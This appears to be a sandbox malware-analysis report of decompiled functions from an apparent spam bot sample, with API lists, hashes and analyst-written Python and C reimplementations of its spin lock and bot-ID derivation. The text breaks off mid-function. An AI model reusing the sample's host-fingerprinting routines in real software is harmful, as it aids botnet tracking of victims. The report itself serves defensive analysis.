                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                                                                  • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                                                                  • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                                                                  • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                                                                  • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004030FA(LONG* _a4) {
                                                                                                                                  				long _t3;
                                                                                                                                  				long _t5;
                                                                                                                                  
                                                                                                                                  				_t5 = GetTickCount();
                                                                                                                                  				while(1) {
                                                                                                                                  					_t3 = InterlockedExchange(_a4, 1);
                                                                                                                                  					if(_t3 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t3 = GetTickCount() - _t5;
                                                                                                                                  					if(_t3 < 0x1388) {
                                                                                                                                  						Sleep(0);
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				return _t3;
                                                                                                                                  			}





Statement addresses, in source order (0x00000000 marks a line that emits no instruction of its own): 0x0040310b 0x00403122 0x00403128 0x0040312c 0x00000000 0x00000000 0x00403111 0x00403118 0x0040311c 0x00000000 0x0040311c 0x00000000 0x00403118 0x00403131

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403103
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040310F
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                                                                  • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                                                                  • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                                                                  • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
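E00404BD1 and E004030FA (and the function whose tail opens this section, which shares the same API signature CountTick$ExchangeInterlockedSleep) are one routine: a spin lock with a 0x1388 = 5000 ms timeout. InterlockedExchange swaps 1 into the lock word and returns the old value; 0 means the caller now owns the lock and the function returns 0. Otherwise the loop yields with Sleep(0) and retries until GetTickCount reports 5000 ms elapsed, at which point it returns the elapsed tick count, so a non-zero return means "timed out, lock not held". The Python below is an added reimplementation to make those return semantics testable; it is not the sample's code. It assumes a lock-guarded swap as a stand-in for InterlockedExchange (Python has no atomic exchange), an injectable millisecond clock so the timeout path can be driven deterministically, and a 32-bit wrap of the subtraction to mirror DWORD tick arithmetic.

```python
import threading
import time

SPIN_TIMEOUT_MS = 0x1388  # 5000 ms, the constant compared against in all three functions


class InterlockedCell:
    """Stand-in for the LONG the sample flips with InterlockedExchange.
    Assumption: a Lock around the swap gives the atomicity the intrinsic provides."""

    def __init__(self, value: int = 0):
        self._value = value
        self._guard = threading.Lock()

    def exchange(self, new: int) -> int:
        with self._guard:
            old, self._value = self._value, new
            return old


def _tick_ms() -> int:
    return int(time.monotonic() * 1000)


def try_acquire(cell: InterlockedCell, timeout_ms: int = SPIN_TIMEOUT_MS, now_ms=None) -> int:
    """Mirror of E004030FA: 0 when the lock was taken, else elapsed ms (>= timeout_ms)."""
    now_ms = now_ms or _tick_ms
    start = now_ms()
    while True:
        if cell.exchange(1) == 0:
            return 0                       # previous value 0: we now own the lock
        # GetTickCount wraps every ~49.7 days; DWORD subtraction still yields the
        # true elapsed value, which the mask reproduces here
        elapsed = (now_ms() - start) & 0xFFFFFFFF
        if elapsed < timeout_ms:
            time.sleep(0)                  # Sleep(0): give up the time slice and retry
            continue
        return elapsed                     # timed out: non-zero, lock NOT held


def release(cell: InterlockedCell) -> None:
    cell.exchange(0)


if __name__ == "__main__":
    lock = InterlockedCell()
    print("free lock ->", try_acquire(lock))              # 0: acquired immediately
    result = []
    worker = threading.Thread(target=lambda: result.append(try_acquire(lock, 50)))
    worker.start()
    worker.join()
    print("held lock, 50 ms budget ->", result[0])         # >= 50: timed out
    release(lock)
    print("after release ->", try_acquire(lock))           # 0 again
```

Callers in the sample treat the return as a boolean failure flag, so a reader of the decompiled code should not mistake the non-zero path for a success count.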

                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				signed int _t50;
                                                                                                                                  				signed int _t53;
                                                                                                                                  				int _t59;
                                                                                                                                  				signed int _t60;
                                                                                                                                  				long _t68;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				void* _t78;
                                                                                                                                  				void* _t85;
                                                                                                                                  
                                                                                                                                  				_t78 = _a8;
                                                                                                                                  				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
                                                                                                                                  				_t7 =  &_a16; // 0x406b2c
                                                                                                                                  				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                                                  				_t68 =  *(_t85 + 0x14);
                                                                                                                                  				_t50 =  *_t7 - _t68;
                                                                                                                                  				_v8 = _t50;
                                                                                                                                  				if(_t68 >= _a12) {
                                                                                                                                  					L5:
                                                                                                                                  					_a16 = _a16 & 0x00000000;
                                                                                                                                  				} else {
                                                                                                                                  					_t74 =  *(_t85 + 0x10);
                                                                                                                                  					if(_t74 == 0) {
                                                                                                                                  						goto L5;
                                                                                                                                  					} else {
                                                                                                                                  						_v12 = _t74;
                                                                                                                                  						_a16 = _t50 / _t74;
                                                                                                                                  						if(_a16 < 1) {
                                                                                                                                  							_a16 = 1;
                                                                                                                                  						}
                                                                                                                                  						_t20 =  &_a16; // 0x406b2c
                                                                                                                                  						 *(_t85 + 0x10) =  *_t20 * _t74;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				if(WriteFile(_a4, _t78, _t68,  &_v8, 0) == 0 || _v8 != _t68) {
                                                                                                                                  					if(_a16 != 0) {
                                                                                                                                  						 *(_t85 + 0x10) = _v12;
                                                                                                                                  					}
                                                                                                                                  					_t53 = 0;
                                                                                                                                  				} else {
                                                                                                                                  					if(_a16 == 0) {
                                                                                                                                  						L13:
                                                                                                                                  						_t53 = _t68;
                                                                                                                                  					} else {
                                                                                                                                  						 *(_t85 + 0x10) = _v12;
                                                                                                                                  						while(1) {
                                                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                                                  							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0);
                                                                                                                                  							_t60 = _v8;
                                                                                                                                  							if(_t59 == 0 || _t60 != _v12) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							_t68 = _t68 + _t60;
                                                                                                                                  							_t41 =  &_a16;
                                                                                                                                  							 *_t41 = _a16 - 1;
                                                                                                                                  							if( *_t41 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						asm("sbb eax, eax");
                                                                                                                                  						_t53 =  !_t60 & _t68 + _t60;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				L18:
                                                                                                                                  				return _t53;
			}

Line addresses (decompiler address column, one entry per listing line): 0x0040698f 0x00406995 0x004069a7 0x004069aa 0x004069ac 0x004069af 0x004069b1 0x004069b7 0x004069e0 0x004069e0 0x004069b9 0x004069b9 0x004069be 0x00000000 0x004069c0 0x004069c4 0x004069c7 0x004069d0 0x004069d2 0x004069d2 0x004069d5 0x004069db 0x004069db 0x004069be 0x004069e4 0x004069fd 0x00406a51 0x00406a56 0x00406a56 0x00406a59 0x00406a04 0x00406a08 0x00406a3c 0x00406a3c 0x00406a0a 0x00406a0d 0x00406a10 0x00406a10 0x00406a27 0x00406a2b 0x00406a2e 0x00000000 0x00000000 0x00406a35 0x00406a37 0x00406a37 0x00406a3a 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00406a3a 0x00406a45 0x00406a49 0x00406a49 0x00406a08 0x00406a5b 0x00406a5f

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                                                                  • WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID: ,k@
                                                                                                                                  • API String ID: 3934441357-1053005162
                                                                                                                                  • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                                                                  • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                                                                  • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                                                                  • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _t29;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				intOrPtr _t45;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  
                                                                                                                                  				if(_a8 <= 0) {
                                                                                                                                  					L14:
                                                                                                                                  					return _t29;
                                                                                                                                  				}
                                                                                                                                  				_t29 = E004030FA(0x412c00);
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				if(_a8 <= 0) {
                                                                                                                                  					L13:
                                                                                                                                  					 *0x412c00 =  *0x412c00 & 0x00000000;
                                                                                                                                  					goto L14;
                                                                                                                                  				} else {
                                                                                                                                  					do {
                                                                                                                                  						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
                                                                                                                                  						_t45 =  *((intOrPtr*)(_t50 - 0x24));
                                                                                                                                  						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
                                                                                                                                  							_t10 = _t50 - 0x1c;
                                                                                                                                  							 *_t10 =  *(_t50 - 0x1c) - 1;
                                                                                                                                  							if( *_t10 < 0) {
                                                                                                                                  								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
                                                                                                                                  							}
                                                                                                                                  							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
                                                                                                                                  						}
                                                                                                                                  						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
                                                                                                                                  						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
                                                                                                                                  							_t43 = 2;
                                                                                                                                  							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
                                                                                                                                  							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
                                                                                                                                  							_t34 =  *((intOrPtr*)(_t45 + 0x10));
                                                                                                                                  							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
                                                                                                                                  								 *((intOrPtr*)(_t45 + 8)) = _t43;
                                                                                                                                  								if( *0x412bfc == 0) {
                                                                                                                                  									E00406509(_t34);
                                                                                                                                  									 *0x412bfc = 1;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                  						_t29 = _v8;
                                                                                                                                  					} while (_t29 < _a8);
                                                                                                                                  					goto L13;
                                                                                                                                  				}
			}

Line addresses (decompiler address column, one entry per listing line): 0x004038fa 0x00403989 0x0040398b 0x0040398b 0x00403905 0x0040390b 0x00403911 0x00403982 0x00403982 0x00000000 0x00403913 0x0040391b 0x00403924 0x00403926 0x0040392e 0x00403930 0x00403930 0x00403933 0x00403935 0x00403935 0x0040393b 0x0040393b 0x0040393e 0x00403947 0x0040394b 0x0040394c 0x0040394f 0x00403952 0x00403958 0x0040395a 0x00403964 0x00403966 0x0040396b 0x0040396b 0x00403964 0x00403958 0x00403975 0x00403978 0x0040397b 0x00000000 0x00403981

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                                                                    • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 3716169038-2903620461
                                                                                                                                  • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                                                                  • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                                                                  • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                                                                  • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
Uniqueness Score: -1.00%

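The function E00401B71 listed next derives a per-host identifier: the first four bytes of the zero-filled GetComputerNameA buffer (read as one DWORD, because `_v28` is a char that gets XORed with a long) are XORed with the volume serial number from GetVolumeInformationA and with the return value of E00401AC3, the result is masked to 31 bits, and if that comes out zero a second source (E0040ECA5, also masked) is used instead. The model below is an added analyst's re-implementation, not the sample's code: `seed` stands in for the unknown return value of E00401AC3, `fallback` for that of E0040ECA5, the non-zero return path is an assumption because the listing is cut off after the zero check, and all inputs are constructed so nothing touches the Windows API. The point worth noticing is that only four characters of the computer name reach the ID.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stack buffer that receives GetComputerNameA() in the listing: it is
 * zero-filled first (the stosd/stosw/stosb run), and 0xf = 15 is the size
 * passed to the API, i.e. the NetBIOS name limit. */
#define NAME_BUF_LEN 20
#define MAX_NAME_LEN 15

/* The listing computes `_v28 ^ _v8` with _v28 declared as a char, which is
 * the first four bytes of the name buffer read as a little-endian DWORD.
 * Short names leave trailing zero bytes because the buffer was cleared. */
static uint32_t name_dword(const char *computer_name)
{
    unsigned char buf[NAME_BUF_LEN];
    size_t n = strlen(computer_name);

    memset(buf, 0, sizeof buf);
    if (n > MAX_NAME_LEN)
        n = MAX_NAME_LEN;            /* assumption: treat over-long input as truncated */
    memcpy(buf, computer_name, n);

    return (uint32_t)buf[0] | ((uint32_t)buf[1] << 8) |
           ((uint32_t)buf[2] << 16) | ((uint32_t)buf[3] << 24);
}

/* Model of E00401B71 (added re-implementation, not the sample's code).
 * seed     = return value of E00401AC3 (unknown here, supplied by caller)
 * fallback = return value of E0040ECA5 (unknown here, supplied by caller) */
uint32_t derive_bot_id(const char *computer_name, uint32_t volume_serial,
                       uint32_t seed, uint32_t fallback)
{
    uint32_t id = (name_dword(computer_name) ^ volume_serial ^ seed) & 0x7fffffffu;

    if (id == 0)
        return fallback & 0x7fffffffu;   /* the zero case takes the second source, same 31-bit mask */

    return id;   /* assumption: the truncated tail returns _v8 on the non-zero path */
}

int main(void)
{
    /* constructed inputs: a fake host name, volume serial, seed and fallback */
    printf("id = %08x\n",
           derive_bot_id("DESKTOP-7Q2", 0xA1B2C3D4u, 0x12345678u, 0x0EADBEEFu));
    /* same first four characters, same serial and seed: same ID */
    printf("id = %08x\n",
           derive_bot_id("DESKTOP-ZZZZ", 0xA1B2C3D4u, 0x12345678u, 0x0EADBEEFu));
    return 0;
}
```

Because everything past the fourth character of the host name is discarded, two machines with the same name prefix and the same volume serial and seed produce the same identifier; when matching sandbox traffic against a real incident, compare on the serial-derived part rather than the host name.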
                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                  			E00401B71() {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				void* _v27;
                                                                                                                                  				char _v28;
                                                                                                                                  				signed int _t12;
                                                                                                                                  				signed int _t28;
                                                                                                                                  
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosw");
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				asm("stosb");
                                                                                                                                  				_v12 = 0xf;
                                                                                                                                  				_t12 = E00401AC3();
                                                                                                                                  				GetComputerNameA( &_v28,  &_v12);
                                                                                                                                  				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
                                                                                                                                  				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
                                                                                                                                  				_v8 = _t28;
                                                                                                                                  				if(_t28 == 0) {
                                                                                                                                  					return E0040ECA5() & 0x7fffffff;
                                                                                                                                  				}
                                                                                                                                  				return _t28;
                                                                                                                                  			}

APIs
  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
• GetComputerNameA.KERNEL32 ref: 00401BA3
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: AddressComputerInformationLibraryLoadNameProcVolume
• String ID: localcfg
• API String ID: 2777991786-1857712256
• Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
• Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
• Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
• Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
	void* _t15;
	long _t17;
	signed int _t29;
	long* _t31;

	_t29 = 0;
	if(_a8 > 0) {
		do {
			_t31 = _a4 + _t29 * 4;                       // _a4 is an array of _a8 pointers to entries
			_t17 =  *_t31;
			if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {   // entry state 1 with an empty name field
				 *((char*)(_t17 + 0x11)) = _a20;
				lstrcpynA( *_t31 + 0x12, _a16, 0x3e);    // copy at most 0x3e bytes of _a16 into the entry's name field
				 *((char*)( *_t31 + 0x4f)) = 0;          // force NUL termination at the end of the 0x3e-byte field
				 *((char*)( *_t31 + 0x10)) = _a12;       // set the new entry state
				if( *((char*)( *_t31 + 0x10)) != 2) {
					_t17 = InterlockedIncrement(0x413640);   // global counter for states other than 2
				} else {
					_t17 = InterlockedIncrement(0x41363c);   // global counter for state 2
				}
			}
			_t29 = _t29 + 1;
		} while (_t29 < _a8);
		return _t17;
	}
	return _t15;                                         // decompiler artifact: _t15 is never assigned on this path
}

APIs
• lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
• InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: IncrementInterlockedlstrcpyn
• String ID: %FROM_EMAIL
• API String ID: 224340156-2903620461
• Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
• Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
• Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
• Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
Uniqueness

Uniqueness Score: -1.00%

APIs
• gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
• inet_ntoa.WS2_32(?), ref: 004026E4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: gethostbyaddrinet_ntoa
• String ID: localcfg
• API String ID: 2112563974-1857712256
• Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
• Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
• Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
• Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
Uniqueness

Uniqueness Score: -1.00%

APIs
• inet_addr.WS2_32(00000001), ref: 00402693
• gethostbyname.WS2_32(00000001), ref: 0040269F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: gethostbynameinet_addr
• String ID: time_cfg
• API String ID: 1594361348-2401304539
• Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
• Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
• Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
• Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040EAE4(CHAR* _a4) {
	struct HINSTANCE__* _t2;

	_t2 =  *0x4136f4; // 0x0                             // cached module handle for ntdll.dll, initially NULL
	if(_t2 != 0) {
		L3:
		return GetProcAddress(_t2, _a4);                 // resolve the export named by _a4 from the cached handle
	} else {
		_t2 = LoadLibraryA("ntdll.dll");                 // first call: load ntdll.dll and cache the handle
		 *0x4136f4 = _t2;
		if(_t2 != 0) {
			goto L3;
		} else {
			return _t2;                                  // LoadLibraryA failed: return NULL
		}
	}
}

APIs
• LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000), ref: 0040EAF2
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040EB07
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ntdll.dll
• API String ID: 2574300362-2227199552
• Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
• Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
• Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
• Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
	signed int _v8;
	void* _v12;
	char _v368;
	void* _t64;
	signed short* _t66;
	intOrPtr* _t67;
	intOrPtr* _t72;
	intOrPtr* _t76;
	intOrPtr* _t82;
	short _t86;
	intOrPtr* _t87;
	signed int _t94;
	intOrPtr _t96;
	signed int _t99;
	short* _t100;
	void* _t101;
	void* _t102;
	void* _t103;
	intOrPtr _t109;
	intOrPtr _t110;
	intOrPtr _t111;
	intOrPtr _t114;
	void* _t115;
	intOrPtr* _t116;
	void* _t117;
	signed int _t118;
	void* _t121;
	void* _t122;
	void* _t123;
	void* _t124;

	_t116 = _a12;
	_t94 = 0;
	 *_t116 = 0;
	_t117 = E00402D21(_a4);
	if(_t117 != 0) {
		if( *_t117 != 0) {
			_v12 = _t117;
			_a12 = _a8;
			while(_t94 < 5) {
				_t9 = _t117 + 8; // 0x8
				_t104 = _t9;
				_t82 = _t9;
				_t10 = _t82 + 1; // 0x9
				_v8 = _t10;
				do {
					_t114 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t114 != 0);
				E0040EE08(_a12, _t104, _t82 - _v8 + 1);
				_t86 =  *((intOrPtr*)(_t117 + 4));
				_a12 = _a12 + 0x100;
				_t122 = _t122 + 0xc;
				 *_t116 =  *_t116 + 1;
				_t117 =  *_t117;
				 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
				_t94 = _t94 + 1;
				if(_t117 != 0) {
					continue;
				}
				break;
			}
			HeapFree(GetProcessHeap(), 0, _v12);
			_v8 = _v8 & 0x00000000;
			if( *_t116 == 1) {
				L24:
				return 1;
			}
			_t64 =  *_t116 - 1;
			_a12 = _a8;
			do {
				_t118 = _v8;
				_t99 = _t118;
				if(_t118 >=  *_t116 - 1) {
					L17:
					_t66 = _t121 + _v8 * 2 - 0x6c;
					_t100 = _t121 + _t118 * 2 - 0x6c;
					 *_t66 =  *_t100;
					_t67 = _a12;
					 *_t100 =  *_t66 & 0x0000ffff;
					_t101 = _t67 + 1;
					do {
						_t109 =  *_t67;
						_t67 = _t67 + 1;
					} while (_t109 != 0);
					E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
					_t123 = _t122 + 0xc;
					_t120 = (_t118 << 8) + _a8;
					_t72 = (_t118 << 8) + _a8;
					_t102 = _t72 + 1;
					do {
						_t110 =  *_t72;
						_t72 = _t72 + 1;
					} while (_t110 != 0);
					E0040EE08(_a12, _t120, _t72 - _t102 + 1);
					_t76 =  &_v368;
					_t124 = _t123 + 0xc;
					_t103 = _t76 + 1;
					do {
						_t111 =  *_t76;
						_t76 = _t76 + 1;
					} while (_t111 != 0);
					goto L23;
				} else {
					goto L14;
				}
				do {
					L14:
					if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
